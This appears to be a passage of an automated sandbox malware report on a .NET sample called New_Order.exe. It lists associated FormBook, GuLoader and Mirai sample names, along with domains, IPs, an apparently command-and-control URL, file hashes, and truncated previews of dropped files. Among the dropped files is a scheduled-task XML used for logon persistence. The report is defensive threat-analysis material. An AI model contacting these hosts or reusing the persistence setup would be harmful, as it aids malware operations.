                                                                                              • www.ihhslovenia.org/qbru/?ZdpLg=bWu9yiBou+FZdrZH54IU38dbRNZc6h2aUUVX4hTWoDZFlNghVJprQrvrZFACfJAxbDbBl5+hnaXgraKDNN0bzjAfvXhDc8nK5g==&Ebexb=v6ELGplxeJsx7

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              www.fdissolutions.netfile.exeGet hashmaliciousFormBookBrowse
                                                                                              • 109.68.33.25
                                                                                              Invoice.exeGet hashmaliciousUnknownBrowse
                                                                                              • 109.68.33.25
                                                                                              72RSDOCK.EXE.exeGet hashmaliciousFormBookBrowse
                                                                                              • 109.68.33.25
                                                                                              www.pay4dance.xyzfile.exeGet hashmaliciousFormBookBrowse
                                                                                              • 66.29.155.54
                                                                                              22082023_dekont.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 66.29.155.54

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              SEDO-ASDE5b5erB7O9O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              5lFjzZyN2w.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              REQUEST FOR 01-DEC 2023.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              FRA-4181.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              Jooikb3Gb3fksCH.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              00158007317748300pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.117
                                                                                              recibo_vencimentopdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.117
                                                                                              Altogether.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              Plyshaar.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.19
                                                                                              HURNER_Schweisstechni_L.L.C.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.94
                                                                                              file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                              • 91.195.240.135
                                                                                              DocScan 105811-26.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              DocScan 814-1125-2023.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              84LQ5L8BA4.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 91.195.240.117
                                                                                              BFC_REF_#3056.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                              • 91.195.240.123
                                                                                              Advance_payment_against_import_BOE_No._5801890.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              Reverse_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              confirm_the_payment.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              Advice_Ref[GLV626201911].exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.123
                                                                                              DHL_Receipt_AWB811471018477.exeGet hashmaliciousFormBookBrowse
                                                                                              • 91.195.240.19
                                                                                              TRANSIP-ASAmsterdamtheNetherlandsNLPO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 37.97.254.27
                                                                                              PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 37.97.254.27
                                                                                              PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                              • 37.97.254.27
                                                                                              file.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                                              • 95.170.75.142
                                                                                              Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                                              • 185.211.251.125
                                                                                              F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                                              • 37.97.214.109
                                                                                              INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                                              • 95.170.75.168
                                                                                              NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 37.97.254.27
                                                                                              003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              Document.exeGet hashmaliciousFormBookBrowse
                                                                                              • 37.97.254.27
                                                                                              ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                                              • 95.170.75.197
                                                                                              sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 149.210.216.118

                                                                                              JA3 Fingerprints

                                                                                              No context

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_Order.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QjSljS.exe.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1216
                                                                                              Entropy (8bit):5.34331486778365
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):2232
                                                                                              Entropy (8bit):5.380285623575084
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:+WSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//ZMRvUyus:+LHxvCZfIfSKRHmOugras
                                                                                              MD5:9263C617DF6F1DC2D198F07F6D8C86CC
                                                                                              SHA1:394FFB7A842D97EAED9139B2C77EE658FF5D5E5C
                                                                                              SHA-256:F562220341D33CC067DAE8EA1AE7AD9028CBC2473EBBB961CF1AC863657526FF
                                                                                              SHA-512:72883F543D33760D53D283343E5D93ECB13D1AA79658AD590166DE8C623F6FBC3C71A4DC500A61D7C32B13464ED0E102FD55270CB18EEA4D49E4302DDE1FEE9E
                                                                                              Malicious:false
                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                              C:\Users\user\AppData\Local\Temp\1f29T718

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\wextract.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4z2lzf2f.4z3.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zcbk2x4.qig.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rusuysv.wta.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wb3ftei.acf.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0qj30je.drp.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgb5tya3.kq0.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sx1dn2ba.rg2.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynjpkpxp.wow.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\tmpBC11.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):1572
                                                                                              Entropy (8bit):5.109060916426997
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                              MD5:1F41339F82C704BA42496C1FB31F5BCC
                                                                                              SHA1:AE59B7164779F5A1FD836959B8C5C03A9CF15E53
                                                                                              SHA-256:3B0096C846898B6CC8910E2326B2746408EAB57BA256FEB3957E6C8DB3EDD01F
                                                                                              SHA-512:492E83DE8B6CC9AA0B26B7618D4F13CAFC80ECB77E9B85672ACA643B8C2E9430DA375DD2255D9DC39F386ECBA51F65C8B471AB4455CA843B8DD37A69DAA80FE9
                                                                                              Malicious:true
                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                              C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Roaming\QjSljS.exe
                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                              Category:dropped
                                                                                              Size (bytes):1572
                                                                                              Entropy (8bit):5.109060916426997
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaAVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                                                                                              MD5:1F41339F82C704BA42496C1FB31F5BCC
                                                                                              SHA1:AE59B7164779F5A1FD836959B8C5C03A9CF15E53
                                                                                              SHA-256:3B0096C846898B6CC8910E2326B2746408EAB57BA256FEB3957E6C8DB3EDD01F
                                                                                              SHA-512:492E83DE8B6CC9AA0B26B7618D4F13CAFC80ECB77E9B85672ACA643B8C2E9430DA375DD2255D9DC39F386ECBA51F65C8B471AB4455CA843B8DD37A69DAA80FE9
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                              C:\Users\user\AppData\Roaming\QjSljS.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):764416
                                                                                              Entropy (8bit):7.871758108926244
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:L1CFfELXGkJlSUrMSrtpBD/X6xH1BwaPpvP1kvEFafzcXEb+EldXQFwOCU1Ps+U7:L1CFfQ2k7SUrDfWHTRpGdz8M+EldXZOh
                                                                                              MD5:E63F894AE694122FE230D5A91250BC1F
                                                                                              SHA1:7822C03997F535ED9DB4B3ECCF480924686CB995
                                                                                              SHA-256:1317668C84B4E2FDD8E6341A252F45BB44CFEEEA05B11A2E1918F3F4AFADC935
                                                                                              SHA-512:3421B35AD0CC53863525123E9619351E42A8A249A1B9F5C95F9F15AEEC8CC5F677EB7EAD5A469BFE10A057A28CADBDE5183ABCF28E350CF4CF482A2BAED25C21
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A...............0.................. ........@.. ....................................@.................................9...O....... ...............................p............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B................m.......H.......\...T}......O....n...............................................0...........s...........,..r...p..{.....o3...........,..r...p...{......o3.............,..r...p...{......o3.............,..r~..p...{......o3........+...*....0..1........r...p..(....r...p(.....s......{.....o3......+..*....0...........s.......+..*....0..s........#...............,..r...p..{.....o5...l........,..r...p...{......o5...l..........,..r*..p...{......o5...l.....+...*..0..!........r`..p..(....(......

                                                                                              C:\Users\user\AppData\Roaming\QjSljS.exe:Zone.Identifier

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\New_Order.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.871758108926244
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                              File name:New_Order.exe
                                                                                              File size:764'416 bytes
                                                                                              MD5:e63f894ae694122fe230d5a91250bc1f
                                                                                              SHA1:7822c03997f535ed9db4b3eccf480924686cb995
                                                                                              SHA256:1317668c84b4e2fdd8e6341a252f45bb44cfeeea05b11a2e1918f3f4afadc935
                                                                                              SHA512:3421b35ad0cc53863525123e9619351e42a8a249a1b9f5c95f9f15aeec8cc5f677eb7ead5a469bfe10a057a28cadbde5183abcf28e350cf4cf482a2baed25c21
                                                                                              SSDEEP:12288:L1CFfELXGkJlSUrMSrtpBD/X6xH1BwaPpvP1kvEFafzcXEb+EldXQFwOCU1Ps+U7:L1CFfQ2k7SUrDfWHTRpGdz8M+EldXZOh
                                                                                              TLSH:1CF4010473B85F25C9BE1BF95971610283F6386BA532E35D4CC270EA27A6F111E92F27
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A...............0.................. ........@.. ....................................@................................

                                                                                              File Icon

                                                                                              Icon Hash:90cececece8e8eb0

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4bbc8e
                                                                                              Entrypoint Section:.text
